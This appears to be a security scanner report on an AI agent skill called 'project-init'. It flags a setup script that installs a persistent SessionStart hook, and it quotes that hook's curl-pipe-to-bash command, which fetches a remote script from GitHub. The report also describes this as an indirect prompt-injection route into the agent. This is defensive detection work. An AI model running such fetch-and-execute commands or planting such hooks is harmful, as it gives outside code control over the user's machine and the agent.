project-init

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). The script adds a persistent SessionStart hook that executes an externally hosted script via curl|bash, creating a clear remote code execution / supply-chain backdoor with potential for data exfiltration or credential theft.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The setup script injects a SessionStart hook that runs "curl -fsSL https://raw.githubusercontent.com/ArjenSchwarz/agentic-coding/main/scripts/claude-remote.sh | bash", causing the agent to fetch and execute untrusted third-party content from raw.githubusercontent.com, which can supply arbitrary instructions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill injects a SessionStart hook that runs "bash -c 'curl -fsSL https://raw.githubusercontent.com/ArjenSchwarz/agentic-coding/main/scripts/claude-remote.sh | bash'", which fetches and immediately executes remote shell code at runtime, directly controlling agent behavior.